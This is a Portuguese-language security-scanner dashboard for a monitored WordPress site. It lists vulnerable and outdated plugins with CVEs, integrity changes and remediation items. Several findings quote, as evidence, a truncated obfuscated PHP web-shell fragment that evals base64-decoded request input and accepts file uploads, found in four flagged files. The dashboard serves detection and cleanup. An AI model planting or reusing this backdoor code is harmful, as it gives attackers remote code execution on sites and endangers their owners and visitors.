Detalhe do ativoAtivo monitorado
Voltar para ativos
minhacontadora.com.br HTTP inseguro
WordPress · Frota 20i · último scan agora
100score de risco
Configurar
Postura de segurança1/5
Conexão
Vulnerab.
Integridade
Config
Backup
Integridade & snapshotsbaseline hoje 06:00
/accesson.phpalterado
/wp-content/plugins/background-image-cropper/accesson.phpmalware
/wp-content/plugins/background-image-cropper/image/plugins.phpmalware
/wp-content/plugins/background-image-cropper/image/index.phpmalware
Findings do ativo
Baixo
HTTPS não forçado (conexão insegura) em minhacontadora.com.br
Postura WP · conf. Alta · 20iwp-hx4c9t
Aberto
Crítico
Plugin vulnerável: jet-engine 3.8.11.2 (CVE-2026-66581, CVE-2026-14864, CVE-2026-66613, CVE-2026-28082, CVE-2026-17019, CVE-2026-18202) em minhacontadora.com.br
Aberto
Médio
Plugin desatualizado: wordpress-importer 0.9.5 → 0.9.6 (minhacontadora.com.br)
Vulnerabilidade WP · conf. Alta · 20iwp-1mvr3xr
Aberto
Médio
Plugin desatualizado: wpforms-lite 2.0.0.5 → 2.0.1.1 (minhacontadora.com.br)
Vulnerabilidade WP · conf. Alta · 20iwp-7zqs7u
Aberto
Crítico
Plugin vulnerável: wpmudev-updates 5.0.0 (CVE-2026-76581, CVE-2026-15459) em minhacontadora.com.br
Vulnerabilidade WP · conf. Alta · 20iwp-zfemzvCVE-2026-76581CVE-2026-15459
Aberto
Alto
Arquivo PHP desconhecido na raiz (revisar): /accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-y2l195
Quarentena
Alto
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-kmfkvd
Aberto
Alto
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/plugins.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-bawkby
Aberto
Alto
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/index.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-1ak7cas
Aberto
Conectores do ativo
REST autenticadoAtivo
XML-RPC probeAtivo
SSH / WP-CLIIndisponível
Linha do tempo
Alerta enviado via webhook: Plugin vulnerável: wpmudev-updates 5.0.0 (CVE-2026-76581, CVE-2026-15459) em minhacontadora.com.br
agora
Alerta enviado via email: Plugin vulnerável: wpmudev-updates 5.0.0 (CVE-2026-76581, CVE-2026-15459) em minhacontadora.com.br
agora
Remediação assistida
HTTPS não forçado (conexão insegura) em minhacontadora.com.br
Plugin vulnerável: jet-engine 3.8.11.2 (CVE-2026-66581, CVE-2026-14864, CVE-2026-66613, CVE-2026-28082, CVE-2026-17019, CVE-2026-18202) em minhacontadora.com.br
Plugin desatualizado: wordpress-importer 0.9.5 → 0.9.6 (minhacontadora.com.br)
Plugin desatualizado: wpforms-lite 2.0.0.5 → 2.0.1.1 (minhacontadora.com.br)
Plugin vulnerável: wpmudev-updates 5.0.0 (CVE-2026-76581, CVE-2026-15459) em minhacontadora.com.br
Arquivo PHP desconhecido na raiz (revisar): /accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/plugins.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/index.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Firewall
Carregando… (requer API no ar e o site na 20i).